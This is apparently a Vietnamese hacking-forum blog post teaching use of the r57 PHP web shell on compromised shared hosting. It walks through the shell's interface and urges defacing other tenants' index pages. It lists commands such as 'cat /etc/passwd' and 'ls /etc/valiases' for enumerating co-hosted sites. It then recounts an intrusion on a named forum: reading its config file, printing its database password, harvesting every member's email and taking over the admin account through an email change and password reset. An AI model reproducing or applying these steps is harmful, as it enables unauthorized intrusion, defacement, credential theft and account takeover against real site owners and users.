Jun 10, 2008
155 Views

Khai thác shell r57

Written by

Phần 1: Cơ bản về R57

I. Cơ bản về r57.
1. Các thông tin ta có thể thấy đc qua shell.
Đầu tiên khi nhìn vào r57 các bạn sẽ thấy những dòng trên cùng kiểu như thế này:

– Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có 2 kiểu là bật (on) và tắt (off) (đương nhiên) và rõ ràng là khi dùng shell thì vớ phải thằng safe-mode off dễ ăn hơn thằng on.
– PHP version: 4.4.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF => Đây là các chức năng của trang web đc bật hay tắt ( nhìn thì tự biết ).
– Disable functions: Đây là các hàm nó cấm ko cho sử dụng. Nếu là NONE thì nó chẳng cấm thằng nào. Còn như ở ví dụ trên nó cấm sử dụng các hàm : ini_alter,system,passthru,shell_exec,leak,listen,c hgrp,apache_setenv,define_syslog_variables,openlog ,syslog,ftp_exec.
– HDD Free : 85.49 GB HDD Total : 4733.08 GB => cái lày có cần nói ko nhỉ ???
– Ở cái hộp ngay bên dưới có quả “uname -a : Linux v8 2.6.18.1-grsec+e+f6b+gr219+opt+c4a+gr2b-grsec #1 SMP Thu Oct 19 12:50:29 PDT 2006 i686 GNU/Linux” => Thằng này nó dùng hệ điều hành GNU/Linux ( Chả hiểu j` nhưng thấy trên mấy trang cho tải hđh linux hay có cái GNU này )
– pwd : /home/.orzo/myebuddy/MY-IDIR.COM ( drwxr-xr-x ) => Mình đang ở trong thư mục /home/.orzo/myebuddy/MY-IDIR.COM. Còn cái drwxr-xr-x là mấy cái quyền của mình ở trong thư mục này đã đc thằng admin nó chmod từ trước ( ko biết đã chính xác chưa ). Các bạn có thể tham khảo thêm tại đây: http://Vnbrain.net/showthread.php?t=1778
– Và còn 1 ô ở ngay dưới rất hoành tá tràng là “Executed command”, ở đó bao gồm có 10 cột nhưng chỉ cần chú ý nhất vào 2 cột đó là cột thứ 2 và cột thứ 10.
+ Cột thứ 2 : Nó ghi các quyền của mình có thể làm đc j` với file hoặc thư mục ở cột thứ 10. VD: drwxrwxrwx => chmod 777 hay còn gọi là owner user tức là toàn quyền với file hoặc thư mục đó nhưng gặp đc cái thằng như thế này có lẽ chỉ vài lần trong đời
+ Cột thứ 10 : Nó liệt kê các file và thư mục trong cái thư mục cắm con shell ( ở đây là /home/.orzo/myebuddy/MY-IDIR.COM ) và tất nhiên sẽ thấy luôn cả con shell
2. Làm việc trong r57.
– Run command (ngay dòng đầu tiên) : ô này để đánh các lệnh để chạy shell trong trường hợp này là các lệnh trong linux (cái này thì phải tìm hiểu). Nếu shell nó thông báo là server bật chế độ bảo mật (safe-mode on) thì dòng này sẽ ko có.
– Work directory : Đây là nơi mình đang làm việc (con shell đang ở trong thư mục này). Ở dòng này các bạn chỉ đánh đc tên của các thư mục mà mình muốn vào, còn muốn sem file hay chỉnh sửa file thì phải dùng đến dòng bên dưới. Trong trường hợp này mình đang làm việc trong thư mục và /home/.orzo/myebuddy/MY-IDIR.COM. Nếu bạn muốn vào thư mục daulom thì cần phải đánh /home/.orzo/myebuddy/MY-IDIR.COM/daulom rùi ấn vào Execute.
– File for edit : Nếu bạn muốn sem hoặc sửa 1 file ( mình khoái nhất là sửa file index ) thì sẽ đánh tên file đó vào. Ví dụ bạn muốn sửa file index.html ở trường hợp này bạn cần đánh /home/.orzo/myebuddy/MY-IDIR.COM/index.html rồi ấn vào edit file. Tuyệt đối ko nên nhầm lẫn thằng này với thằng work directory ở bên trên. Cần hiểu rõ rằng thằng này chỉ dung để đọc hoặc sửa file, còn thằng bên trên thì chỉ dung để đi ra hoặc vào 1 thư mục.
– Mấy cái find fủng với upload ở bên dưới thì bạn tự hiểu nhá.
– Đến phần Database:
+ Ô login : Điền dbuser.
+ Password: Điền dbpass.
+ Database: Điền dbname.
Muốn có những thong tin để điền vào mấy cái ông bên dưới này thì phải tự tìm hiểu thôi, mình cũng chẳng biết hướng dẫn thế nào nữa :|.

II. Local hack.
Hờ, cái này thì cũng đơn giản thôi, ko quá khó như mọi người vẫn tưởng ( theo bác backdoor là kiểu hack dễ nhất :|). Cái thể loại local chỉ đơn giản như ở trong win chuyển từ thư mục này sang thư mục khác thôi. Trên server mỗi trang web nằm trong các thư mục khác nhau. Bạn chỉ việc chuyển từ thư mục đang có con shell sang 1 thư mục bên ngoài khác (cái này đọc kĩ phần Work directory nhá) rồi tự nhiên thấy 1 user của 1 trang web nào đó rồi đi vào thư mục đấy rồi vào phần edit, sửa lại cái index rồi …
________________________________________________________________

Phần 2:

giả sử đã up được con r57.php lên host,sau đó cat /etc/passwd và ra được các path của những victim khác trên cùng server:
ex: /home/user1
/home/user2
……………..
vấn đề là làm sao biết được domain của user1 và user2 đây?Tớ đã sử dụng
cat /var/cpanel/accounting.log và cat /etc/domains nhưng đều không thành công

kiểm tra các sites trên cùng server này

ls -la /etc/valiases

dùng thêm live hoặc công cụ tìm kiếm để search
live.com ip : xxx.xxx.xxx.xxx

cd /etc/vdomainaliases && ls -lia
cd /etc/vdomainaliases;ls -lia
cd /etc/valiases && ls -lia
cd /etc/valiases;ls -lia

nó sẽ hiện ra…………………….. dạng như sau

819980 -rw-r–r– 1 flfounin nobody 0 Mar 17 13:34 fl4938r.com
4821034 -rw-r–r– 1 flanchen nobody 0 Mar 17 13:33 flanche.net
4826219 -rw-r–r– 1 bangings nobody 0 Mar 17 13:35 fonerahacks.bangingscrew.com
4826135 -rw-r–r– 1 bangings nobody 0 Mar 17 13:35 fonerahacks.com
4824052 -rw-r–r– 1 illusio4 nobody 0 Mar 17 13:33 forgehalo-net.illusion-gfx.com
4824049 -rw-r–r– 1 illusio4 nobody 0 Mar 17 13:33 forgehalo.net
4823877 -rw-r–r– 1 forgetbu nobody 0 Mar 17 13:33 forgetbuttons.com

______________________________________________

Phần 3:Học local với server nhactre

Trên r57 shell dùng lệnh :

ls /home/yeutruct/public_html/nhactre/

tiếp tục dùng lệnh ls vào thư mục 4rum/includes :

Ah ha, file config đây rồi, dùng lệnh cat /home/yeutruct/public_html/nhactre/4rum/includes/c onfig.php để xem nội dung :

Ta có được các thông tin về database :

$config[‘Database’][‘dbname’] = ‘yeutruct_nhactre’;
$config[‘MasterServer’][‘username’] = ‘yeutruct_nhactre’;
$config[‘MasterServer’][‘password’] = ‘mekiep’;

Trên r57 >>> Database >>> Run SQL query điền các thông tin tìm được vào :

Nhấn Execute .

Tiếp tục run SQL command :

Ta sẽ có được toàn bộ các tables trong database này, nhưng hiện tại vấn đề ở đây chúng ta chỉ cần những tables quan trọng :

Tới đây là thấy khỏe khoắn rồi, userid = 1 đích thị là admin .

Theo các bạn thì chúng ta sẽ làm tiếp thế nào đây? VBB sử dụng hash MD5 đã qua xử lý (salted hashed) nên ko thể dùng hash MD5 bình thường để thay thế. Vậy làm sao để đổi password của admin đây nhỉ ?

Hihi đành chịu khó mất thêm tí thời gian vậy , đổi password ko ổn thì ta sẽ đổi email :

Sẵn tiện tay dùng thêm câu lệnh SELECT email FROM user để ” thâu tóm ” toàn bộ email thành viên diễn đàn này .

Tiếp tục vào forum của trang nhactre.vn và sử dụng chức năng forgot password >>> kết quả tiếp theo :

_____________________________________________________________

Backup Database:

mysql -u username -p password dbname > /path/to/dump.sql

Restore Database:

mysql -u username -p password dbname < /path/to/dump.sql

Article Tags:
·
Article Categories:
Bug & Security
    http://linholiver.com

    https://linholiver.com/diary/about/